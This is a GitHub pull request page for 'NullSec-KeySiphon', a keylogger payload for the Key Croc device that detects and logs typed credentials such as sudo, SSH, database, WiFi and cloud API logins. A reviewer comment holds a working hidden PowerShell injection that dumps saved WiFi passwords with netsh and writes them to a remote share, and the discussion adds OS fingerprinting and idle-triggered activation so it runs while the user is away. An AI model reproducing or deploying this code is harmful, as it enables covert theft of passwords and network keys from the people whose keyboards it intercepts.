feat: NullSec-KeySiphon — Intelligent Keystroke Credential Harvester#73
feat: NullSec-KeySiphon — Intelligent Keystroke Credential Harvester#73bad-antics wants to merge 3 commits intohak5:masterfrom
Conversation
- 25+ MATCH patterns for credential detection - System auth (sudo, su, ssh, runas, passwd) - Database logins (mysql, psql, smbclient) - WiFi credentials (wpa_passphrase, nmcli, netsh) - Cloud/API keys (AWS, Azure, GCloud, tokens) - Web login form detection - Categorized logging (credentials vs general keystrokes) - Optional idle-triggered active recon
| SAVE KEYBOARD $KEYLOG | ||
|
|
||
| # Q STRING injection for silent recon when idle | ||
| # (Optional — uncomment to run recon when user is away) |
There was a problem hiding this comment.
I think the better way to do this is to put content within a function and comment out the function call. This will all the end user to more easily configure the payload, only needs to uncomment 1 line vs multiple.
For example:
wifi_dump() {
WAIT_FOR_IDLE 300
LED B
Q DELAY 500
if [[ "$OS" == "WINDOWS" ]]; then
Q GUI r
Q DELAY 500
Q STRING powershell -w hidden -ep bypass -c "
\$o = @()
\$o += '=== WiFi Profiles ==='
netsh wlan show profiles | Select-String 'All User' | ForEach {
\$name = (\$_ -split ': ')[1].Trim()
\$key = (netsh wlan show profile name=\$name key=clear | Select-String 'Key Content').ToString().Split(':')[1].Trim()
\$o += \"\$name : \$key\"
}
\$o | Out-File -FilePath '\\\\172.16.64.1\\croc_loot\\wifi_auto.txt'
"
Q ENTER
fi
LED G
}
# wifi_dump```
| # WAIT_FOR_IDLE 300 | ||
| # LED B | ||
| # Q DELAY 500 | ||
| # if [[ "$OS" == "WINDOWS" ]]; then |
There was a problem hiding this comment.
Where are you getting the $OS variable? The keycroc does not have native OS detection or an OS global variable. I do not see it defined within the payload.
…ction, call commented out - Add detect_os() function using udev USB enumeration for OS fingerprinting - Wrap active WiFi recon in wifi_dump() function (multi-OS: Win/Mac/Linux) - Comment out wifi_dump and detect_os calls — uncomment to enable - Use STRINGLN instead of STRING+ENTER in injected commands - Version bump to 1.1 Addresses review feedback from hak5peaks: - hak5#73 (comment) - hak5#73 (comment)
|
Thanks for the detailed review @hak5peaks! Just pushed fixes (commit 3f7fb41) addressing both points: Re: wifi_dump function structure — The active WiFi recon is now properly wrapped in a Re: Let me know if anything else needs adjusting! |
1. wifi_dump now calls detect_os() internally so $OS is never undefined — fixes the orphaned variable issue. 2. All active recon wrapped in wifi_dump() as a single function. End user only needs to uncomment one line to enable. 3. Version bumped to 1.2
|
Hey @hak5peaks, pushed fixes in
Let me know if there's anything else! |
|
@hak5peaks — all the review feedback has been addressed in the branch. To summarize:
Ready for re-review whenever you get a chance! Happy to make any further adjustments. |
2 participants
NullSec-KeySiphon
Intelligent keystroke logging payload for the Key Croc with pattern-matching credential detection.
Features:
sudo,su,ssh,runas,passwdmysql,psql,smbclientwpa_passphrase,nmcli,netsh wlanaws configure,az login,gcloud auth, tokens, API keyspassword,login,usernamepatternsOutput:
Optional Active Recon:
Includes commented-out idle-triggered WiFi credential extraction that activates when the user is away.
Cross-platform — detects patterns from Windows, macOS, and Linux terminals.